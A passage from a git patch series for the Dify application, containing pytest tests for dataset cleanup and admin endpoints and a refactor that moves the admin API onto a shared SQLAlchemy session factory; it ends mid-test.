# Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. + + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. + + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. + + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. + + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. + + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. + + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. + + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. + + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. + + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing image files are handled gracefully. + + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. + + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). + + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True From 094f417b32aea22a57b34b1165d93cae4ed82a3b Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 12:01:41 +0800 Subject: [PATCH 19/68] refactor: admin api using session factory (#29628) --- api/app_factory.py | 2 + api/controllers/console/admin.py | 15 +- api/core/db/__init__.py | 0 api/core/db/session_factory.py | 38 ++ api/extensions/ext_session_factory.py | 7 + .../controllers/console/test_admin.py | 407 ++++++++++++++++++ 6 files changed, 462 insertions(+), 7 deletions(-) create mode 100644 api/core/db/__init__.py create mode 100644 api/core/db/session_factory.py create mode 100644 api/extensions/ext_session_factory.py create mode 100644 api/tests/unit_tests/controllers/console/test_admin.py diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..026310a8aa 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -83,6 +83,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -114,6 +115,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/core/db/__init__.py b/api/core/db/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py new file mode 100644 index 0000000000..0eb43d66f4 --- /dev/null +++ b/api/extensions/ext_session_factory.py @@ -0,0 +1,7 @@ +from core.db.session_factory import configure_session_factory +from extensions.ext_database import db + + +def init_app(app): + with app.app_context(): + configure_session_factory(db.engine) diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error 